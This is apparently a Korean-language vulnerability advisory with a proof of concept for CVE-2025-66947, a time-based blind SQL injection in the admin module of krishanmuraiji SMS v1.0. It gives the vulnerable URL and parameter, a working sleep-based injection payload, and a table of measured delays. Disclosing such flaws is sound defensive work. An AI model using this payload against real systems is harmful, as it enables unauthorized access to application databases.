
krishanmuraiji SMS v1.0의 SQL 인젝션 (CVE-2025-66947)
⏱️ 시각적 비교: 정상 응답 vs 약 6초 지연 응답
TL;DR: 관리자 모듈의 GET 매개변수가 응답 지연을 통한 시간 기반 SQL 인젝션을 허용합니다.
krishanmuraiji SMS v1.0에서 관리자 모듈의 GET 매개변수를 제대로 검증하지 않아 시간 기반 블라인드 SQL 인젝션 취약점이 존재합니다.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| 페이로드 | 지연 |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
일관된 지연 = SQL 인젝션 확인됨
이 취약점 패턴은 일반적으로 다음 환경에서 나타납니다:
인증이 필요하고 오류가 숨겨져 있어도,
시간 기반 SQL 인젝션은 여전히 악용 가능하며 위험합니다.
심각도: 높음
CVE-2025-66947
Ranjan Kumar이 PoC는 교육 및 방어 목적으로만 제공됩니다.
CVE-2025-66947, SQL 인젝션, 시간 기반 블라인드 SQL 인젝션, PHP, 관리자 패널